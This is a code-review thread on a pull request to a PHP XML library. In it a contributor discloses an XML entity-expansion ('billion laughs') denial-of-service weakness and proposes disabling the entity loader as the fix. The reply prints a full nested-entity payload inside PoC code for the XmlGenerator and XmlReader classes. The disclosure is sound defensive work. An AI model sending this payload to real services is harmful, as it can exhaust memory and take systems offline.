Model/XmlGenerator.php

```diff
@@ -113,25 +113,24 @@ class XmlGenerator
     /** @var null|\DomDocument */
     protected $domDocument;
 
-    /**
-     * @var string
-     */
-    protected $piNode = '';
-
+    /** @var string */
```

Comment:
Change to 

```php
/** @var array */
```

Reply:
Thanks you for your review @Mik317 😄 , sure i will give the code below,

### XMLGenerator
`<?php`
`use Desperado\XmlBundle\Model\XmlGenerator;`
`$params = '<?xml version="1.0"?>`
`<!DOCTYPE request [`
`<!ENTITY lol "lol">`
`<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">`
`<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">`
`<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">`
`<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">`
`<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">`
`<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">`
`<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">`
`<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">`
`]>'`
`$xmlGenerator = new XmlGenerator;`
`echo $xmlGenerator->generateFromArray($params);`

### XMLReader
`<?php`
`use Desperado\XmlBundle\Model\XmlReader;`
`'$xmlString = <?xml version="1.0"?>`
`<!DOCTYPE request [`
`<!ENTITY lol "lol">`
`<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">`
`<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">`
`<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">`
`<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">`
`<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">`
`<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">`
`<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">`
`<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">`
`]>'`
`<request>`
`<Details>`
`<PaymentParameters>`
`<first_node>first_node_value</first_node>`
`<second_node>second_node_value</second_node>`
`</PaymentParameters>`
`</Details>`
`</request>';`
`$xmlReader = new XmlReader;`
`print_r($xmlReader->processConvert($xmlString));`

DoS can cause in XMLGenerator and XMLReader.
To prevent this DoS, use  `libxml_disable_entity_loader(true);` in that PHP command, so the entities loader will disable, thank you 😃